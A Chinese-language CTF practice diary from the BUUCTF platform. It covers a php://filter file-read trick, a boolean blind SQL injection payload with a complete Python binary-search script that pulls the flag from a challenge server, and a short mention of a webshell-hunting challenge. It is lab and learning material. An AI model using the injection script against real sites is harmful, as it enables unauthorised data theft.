buu刷题(摸鱼)日记2
[ACTF2020 新生赛]Include
居然忘了php://filter伪协议,真是屑啊。
很简单,直接读flag
[CISCN2019 华北赛区 Day2 Web1]Hack World
sql注入自古弱项,研究一下
先上burp炸,用sql insert list 炸。
发现过滤单引号 双引号 注释符号 空格等,并且返回中有布尔值
应该是个盲注
(接下来我就做不来了(毕竟我真的菜))
分析一下wp里的payload:
(ascii(substr((select(flag)from(flag)),1,1))<128)
selec flag from flag不多说,从表里找字段
找出来的字段显然没有回显,需要进行判断。刚好由于弱类型,如果是true就会以1带入,如果false就是0
然而输入0和1回显是不一样的,就可以创造盲注的契机
试一下二分法写了个jo本
import requests
url="http://cb7ec2dc-f0ba-46bf-b97e-800896e15726.node3.buuoj.cn/index.php"
ch = 0
flag = ""
for i in range(1,50):
high = 128
low = 32
mid = (high + low) // 2
while(high>low):
payload = {"id":"(ascii(substr((select(flag)from(flag)),%d,1))<%d)"%(i,mid)}
r = requests.post(url=url,data=payload).text
if "glzjin" in r:
high = mid
else:
low = mid + 1
mid = (high + low) // 2
# print(mid)
flag += chr(int(mid-1))
print(flag)
二分法是好文明,一分钟左右出flag
[强网杯 2019]高明的黑客
强网杯的题目各个都是高达(我是废物)
点开题目
雁过留声,人过留名,此网站已被黑
我也是很佩服你们公司的开发,特地备份了网站源码到www.tar.gz以供大家观赏
下载源码以后把我吓傻了
这tm都是啥
毫不犹豫去看wp
看到赵师傅的博客
其实思路很简单,自带webshell,自己去找,考验写py脚本能力了(我不太行,萎了)
PREVIOUS战术刷buu(摸鱼日记)
NEXTXss